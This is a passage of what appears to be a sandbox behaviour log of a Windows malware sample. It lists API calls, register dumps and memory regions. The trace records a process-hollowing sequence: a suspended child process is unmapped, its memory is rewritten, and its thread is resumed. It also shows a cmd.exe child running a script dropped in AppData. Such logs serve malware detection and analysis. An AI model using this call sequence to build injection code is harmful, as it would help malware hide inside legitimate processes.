returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0114.966] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xdf4, dwThreadId=0xdf8)) returned 1 [0114.968] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0114.968] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0114.968] GetThreadContext (in: hThread=0x48, lpContext=0x160000 | out: lpContext=0x160000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, 
[10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, 
[200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, 
[381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0115.156] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0115.156] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0115.156] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0115.157] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x194900*, nSize=0x1000, 
lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x194900*, lpNumberOfBytesWritten=0x0) returned 1 [0115.157] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x194d00, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0115.157] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x194d00*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x194d00*, lpNumberOfBytesWritten=0x0) returned 1 [0115.164] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x1e9300*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1e9300*, lpNumberOfBytesWritten=0x0) returned 1 [0115.165] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x194a34*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x194a34*, lpNumberOfBytesWritten=0x0) returned 1 [0115.165] SetThreadContext (hThread=0x48, lpContext=0x160000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, 
[78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, 
[168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, 
[349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0115.165] ResumeThread (hThread=0x48) returned 0x1 [0115.165] CloseHandle (hObject=0x48) returned 1 [0115.165] CloseHandle (hObject=0x4c) returned 1 [0115.165] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0115.166] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0115.166] ExitProcess (uExitCode=0x0) Process: id = "47" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0xdc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0xd80" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7513 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7514 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7515 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7516 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7517 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7518 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" 
(normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7519 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7520 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7521 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7522 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8024 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8025 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 8026 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 8027 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8028 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 8029 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8030 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8031 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8032 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 